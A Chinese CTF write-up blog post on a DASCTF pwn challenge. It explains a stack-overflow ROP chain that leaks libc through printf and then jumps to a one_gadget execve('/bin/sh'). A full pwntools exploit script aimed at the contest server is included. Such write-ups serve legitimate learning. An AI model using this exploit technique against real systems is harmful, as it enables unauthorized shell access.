PWN

安恒月赛 DASCTF wp

最简单的 pwn 的解析

Posted by Elli0t on 2020-04-26

题目链接🔗

👴学到了什么?

  • printf 泄漏真实地址的参数使用,以及地址接收的处理
  • one_gadget 神器的了解。这题不知道为啥在 libc 中找的 system 执行会报错
  • 当符号表被删除时(stripped),返回函数就不能用 elf.plt 了
  • 当栈溢出执行了一些操作后,会影响到本身的函数这题也就是 4006D2,所以返回地址直接写程序的头部




因为我自己还是不能很好的理解,所以就把师傅们的原话挂出来了,🙏感谢

补充:后面和 publicQi 师傅研究了一下,不是 rbp 被打乱了,是直接返回到 4006D2 后,printf 函数执行出现错误


就是4006D2这个函数,不能通过 elf.symbols[‘sub_4006D2’] 返回。

也不能填 0x4006D2 地址

要填写 0x4005c0 地址,如果出现一些意外就考虑返回到 start_addr,start 才是真正程序重新开始的地方

one_gadget 神器

功能:查找已知的libc中exevce(“/bin/sh”)语句的地址
用法: one_gadget libc-x.xx.so
官方文档点击此处

1
2
3
4
5
6
7
8
9
10
11
12
root@e703366904de:/pwn# one_gadget libc.so.6
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL

0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL

通过使用one_gadget可以找到获得shell的函数的地址
execve_addr = 0x4f2c5

printf 传参数

printf(‘%s’,elf.got[‘read’]);

payload = 136*'a' + p64(rdi) + p64(0x400875) + p64(rsi_r15) +p64(read_got) + "a"*8 + p64(printf_elf) + p64(sub)
sub 就是上面说的返回地址

exp :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pwn import *
import time

context.terminal=["tmux","sp","-h"]
context.log_level='debug'

DEBUG = 0
LOCAL = True
BIN = './test'
HOST = '183.129.189.60'
PORT = 10061

def exploit(sh):
libc = ELF('./libc.so.6')
libc_system = libc.symbols['system']
libc_bin = libc.search('/bin/sh').next()
libc_read = libc.symbols['read']
#Eli0t
rdi = 0x400823
rsi_r15 = 0x400821
read_got = elf.got['read']
printf_elf = elf.symbols['printf']
#sub = 0x4006d2
sub = 0x4005c0
sh.recvuntil('name:')
sh.sendline('300')
sh.recvuntil('name?')
payload = 136*'a' + p64(rdi) + p64(0x400875) + p64(rsi_r15) +p64(read_got) + "a"*8 + p64(printf_elf) + p64(sub)
sh.sendline(payload)
#read_true = u64(sh.recv(8))
read_true =u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print hex(read_true)
libcc = read_true - libc_read
sh.recvuntil(':')
sh.sendline('300')
sh.recvuntil('name?')
payload_2 = 136*'a' + p64(0x4f2c5 + libcc)
sh.sendline(payload_2.ljust(300,"\xcc"))
sh.interactive()
return

if __name__ == '__main__':
elf = ELF(BIN)
if len(sys.argv) > 1:
LOCAL = False
sh = remote(HOST,PORT)
exploit(sh)
else:
LOCAL = True
sh = process(BIN)
log.info('PID: ' + str(proc.pidof(sh)[0]))
# pause
if DEBUG:
gdb.attach(sh)
exploit(sh)
参考链接

https://n0vice.top/2019/12/12/BUUOJ-pwn-%E4%B8%8D%E5%AE%9A%E6%9C%9F%E6%9B%B4%E6%96%B0/#more